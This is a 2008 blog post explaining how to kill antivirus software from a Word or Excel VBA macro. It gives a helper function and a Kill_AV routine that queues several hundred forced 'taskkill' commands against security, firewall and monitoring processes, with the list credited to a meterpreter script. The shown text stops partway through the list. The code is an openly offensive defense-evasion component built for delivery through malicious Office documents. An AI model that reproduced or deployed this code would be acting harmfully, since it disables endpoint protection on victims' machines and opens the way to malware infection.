Sunday, November 16, 2008

How to Kill Antivirus from Word or Excel VBA

Building off of the previous posts and functions, here's how to kill off antivirus from within a VBA Macro in Excel or Word (I stole this list from the meterpreter script):
Function Build_Cmd_List(arrayCmds, command)

If arrayCmds(0) <> "" Then
ReDim Preserve arrayCmds(UBound(arrayCmds) + 1) As String
End If

arrayCmds(UBound(arrayCmds)) = command

End Function

Function Kill_AV()

Dim arrayCmds() As String
ReDim arrayCmds(0) As String
On Error Resume Next

Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""antivirus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ants.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apimonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aplica32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apvxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""arr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atcon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atro55en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""au.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""auto-protect.nav80try.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autodown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autotrace.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autoupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avconsol.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ave32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgcc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-agnt95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icload95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pccwin98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""serv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkpop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkwctl9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avltmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsynmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwinnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitor9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitornt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""backweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bargains.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bd_professional.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""beagle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""belt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidef.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcpevalsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bisp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blss.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootconf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootwarn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""borg2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""brasil.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bs120.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bundle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bvt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccevtmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccpxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cdp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfgwiz.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""clean.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleanpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""click.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmesys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmgrdian.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmon016.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""connectionmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpf9x206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpfnt206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwnb181.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwntdwmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""datemanager.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dcomx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defalert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defscangui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""deputy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""divx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllcache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllreg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""doors.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpps2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwatson.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drweb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwebupw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dssagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""efpeadm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""emsw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanhnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ethereal.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""etrustcipe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""evpn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exantivirus-cnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exe.avxw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""expert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""explore.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fameh32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fch32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fih32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""firewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fnrb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win_trial.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsaa.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530stbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530wtbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsgk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsm32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsma32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsmb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gator.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbmenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbpoll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""generics.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guarddog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hacktracersetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbinst.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotactio.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hwpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxdl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxiul.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamstats.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""idle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedriver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iexplorer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ifw2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""inetlnfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""init.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intdel.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intren.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""istsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jammer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jdbgmrg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavlite40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpers40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kazza.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""keenvalue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-pf-213-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrl-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrp-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kernel32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""killprocesssetup161.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""launcher.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldnetmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpromenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lnetinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""loader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""localnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lordpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luau.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lucomserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luinit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luspt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mapisvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcmnhdlr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcshield.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mctool.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsshld.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""md.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfw2en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfweng3.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrtcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mghtml.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""minilog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mmod.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""monitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mostat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mrflux.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msbb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msblast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msccn32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscman.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdos.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msiexec16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msinfo32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mslaugh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmgt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmsgri32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssmmc32.exe"""
